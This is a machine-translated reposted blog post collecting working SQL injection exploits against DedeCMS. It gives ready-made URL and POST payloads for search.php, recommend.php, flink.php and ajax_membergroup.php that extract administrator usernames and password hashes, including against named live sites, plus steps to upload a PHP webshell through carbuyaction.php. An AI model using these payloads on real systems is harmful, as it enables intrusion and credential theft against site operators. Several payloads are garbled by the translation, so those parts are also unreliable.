Shulou(Shulou.com)06/01 Report--

Explosion path: data/mysql_error_trace.inc

I. repair and utilization of dedecms plus/search.php injection vulnerabilities

0 × 1:

Http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion] = a

Report an error if it is: Safe Alert: Request Error step 2!

Take advantage of the following exp:

Http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

0 × 2:

Http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[ uNion] = a

Report an error if it is: Safe Alert: Request Error step 1!

Take advantage of the following exp:

Http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

2. DedeCms recommend.php injection

Exp:

Http://0day5.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8, 9% 23 @ `\\% 27` + & _ files [type] [name] = 1.jpgdeclare _ files [type] [type] = application/octet-stream&_ files [type] [size] = 4294

III. Flink.php injection

0x1: first check the CAPTCHA through flink_add.php

0x2: send post packets using Firefox's hackbar

Exp:

Check the version:

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if (@ ```, 0x7c, (select version ()), 1jue 1dhoe 1dhowne1) #, @``` & typeid=1&url=http%3A%2F%2F&validate= CAPTCHA & _ files [webname] [name] = 1.giftings _ files [webname] [type] = paired _ files picpathcountrgifxrabbit _ fileswebname] [size] = 10percent _ files[ webname] [tmp_name] = pass\

Check the password:

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if (@ ``, 0x7c, (select concat (userid,0x7c,pwd) from dede_admin limit 0pr 1)), 1meme 1meme 1meme 1) # @ ```& typeid=1&url=http%3A%2F%2F&validate= verification code & _ files [webname] [name] = 1.gifleaves _ files [webname] [type] = pairwalled picpathpathgifxname _ files [webname] [size] = 10 percent files [webname] [tmp_name] = pass\

Please refer to the

Http://www.wooyun.org/bugs/wooyun-2014-051950

4. Ajax_membergroup.php injection vulnerabilities

① injection vulnerability.

This station http://www.30tianlong.com/

First visit the "/ data/admin/ver.txt" page to get the last upgrade time of the system.

Then visit the "/ member/ajax_membergroup.php?action=post&membergroup=1" page, as shown in the figure to show that the vulnerability exists.

Then write the sentence.

View the administrator account

Http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

Admin

View administrator password

Http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

8d29b1ef9f8c5a5af429

View administrator password

What you get is 19 bits, remove the first three bits and the last bit, and get the administrator's 16-bit MD5

8d2

9b1ef9f8c5a5af42

nine

Cmd5 did not solve it, but had to test the second method.

② upload vulnerabilities:

Just log in to the member center and visit the page link

Http://www.xxxx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[/code]=../dialog/select_soft_post

As shown in the figure, it shows that the upload page "/ dialog/select_soft_post" has been successfully called through "/ plus/carbuyaction.php"

So change the Php one-sentence * extension to "rar" and so on, using the submission page upload1.htm

File:

Newname: submit

You can upload it successfully.

Please indicate the reprinted article, reproduced from: pony's Blog http://www.i0day.com

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.